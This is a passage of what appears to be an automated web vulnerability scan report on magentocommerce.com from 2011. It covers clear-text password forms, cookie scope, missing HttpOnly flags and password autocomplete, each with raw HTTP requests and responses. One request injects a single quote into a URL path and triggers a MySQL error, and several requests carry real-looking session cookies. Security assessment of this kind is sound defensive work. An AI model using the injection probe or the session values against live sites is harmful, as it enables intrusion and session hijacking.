The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://www.magentocommerce.com/boards/viewannounce/228974_11106/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewannounce/228974_11106/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /boards/viewannounce/228974_11106/ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.magentocommerce.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:18:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 04:27:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313187528; expires=Sat, 11-Aug-2012 18:18:48 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A34%3A%22%2Fboards%2Fviewannounce%2F228974_11106%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 18:18:48 GMT
Content-Length: 40161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

3.2. http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/ HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:16:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 04:24:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313187366; expires=Sat, 11-Aug-2012 18:16:06 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 18:16:07 GMT
Content-Length: 78623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

4. Cookie scoped to parent domain  previous  next
There are 3 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


4.1. http://www.magentocommerce.com/boards/viewannounce/228974_11106/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.magentocommerce.com
Path:   /boards/viewannounce/228974_11106/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boards/viewannounce/228974_11106/ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.magentocommerce.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:18:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 04:27:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313187528; expires=Sat, 11-Aug-2012 18:18:48 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A34%3A%22%2Fboards%2Fviewannounce%2F228974_11106%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 18:18:48 GMT
Content-Length: 40161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

4.2. http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.magentocommerce.com
Path:   /magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/ HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:16:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 04:24:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313187366; expires=Sat, 11-Aug-2012 18:16:06 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 18:16:07 GMT
Content-Length: 78623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

4.3. http://www.magentocommerce.com/boards/viewannounce/228974_11106%27/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewannounce/228974_11106%27/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /boards/viewannounce/228974_11106%27/ HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/0
Cookie: __utma=94789760.1662188125.1313161373.1313161373.1313173765.2; __utmz=94789760.1313173765.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313161374101-89036; guid=e835a9ce977f37d2351e667233649d7a; homepage_intro=1; __switchTo5x=58; __unam=28e3065-131be8b2931-29750417-1; __utmb=94789760.2.10.1313173765; exp_domain=c; exp_last_activity=1313188810; exp_last_visit=997828810; PHPSESSID=rffphmccmmc1vmaobjenl1i6t6; __utmc=94789760

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:52:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313189577; expires=Sat, 11-Aug-2012 18:52:57 GMT; path=/; domain=magentocommerce.com
Content-Length: 645

MySQL ERROR:<br /><br />Error Number: 1064<br /><br />Description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next
There are 3 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://www.magentocommerce.com/boards/viewannounce/228974_11106/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.magentocommerce.com
Path:   /boards/viewannounce/228974_11106/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boards/viewannounce/228974_11106/ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.magentocommerce.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:18:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 04:27:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313187528; expires=Sat, 11-Aug-2012 18:18:48 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A34%3A%22%2Fboards%2Fviewannounce%2F228974_11106%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 18:18:48 GMT
Content-Length: 40161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

5.2. http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.magentocommerce.com
Path:   /magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/ HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:16:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 04:24:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313187366; expires=Sat, 11-Aug-2012 18:16:06 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 18:16:07 GMT
Content-Length: 78623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

5.3. http://www.magentocommerce.com/boards/viewannounce/228974_11106%27/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewannounce/228974_11106%27/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /boards/viewannounce/228974_11106%27/ HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/0
Cookie: __utma=94789760.1662188125.1313161373.1313161373.1313173765.2; __utmz=94789760.1313173765.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313161374101-89036; guid=e835a9ce977f37d2351e667233649d7a; homepage_intro=1; __switchTo5x=58; __unam=28e3065-131be8b2931-29750417-1; __utmb=94789760.2.10.1313173765; exp_domain=c; exp_last_activity=1313188810; exp_last_visit=997828810; PHPSESSID=rffphmccmmc1vmaobjenl1i6t6; __utmc=94789760

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:52:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313189577; expires=Sat, 11-Aug-2012 18:52:57 GMT; path=/; domain=magentocommerce.com
Content-Length: 645

MySQL ERROR:<br /><br />Error Number: 1064<br /><br />Description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near
...[SNIP]...

6. Password field with autocomplete enabled  previous  next
There are 2 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


6.1. http://www.magentocommerce.com/boards/viewannounce/228974_11106/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewannounce/228974_11106/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /boards/viewannounce/228974_11106/ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.magentocommerce.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:18:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 04:27:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313187528; expires=Sat, 11-Aug-2012 18:18:48 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A34%3A%22%2Fboards%2Fviewannounce%2F228974_11106%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 18:18:48 GMT
Content-Length: 40161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

6.2. http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/ HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:16:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
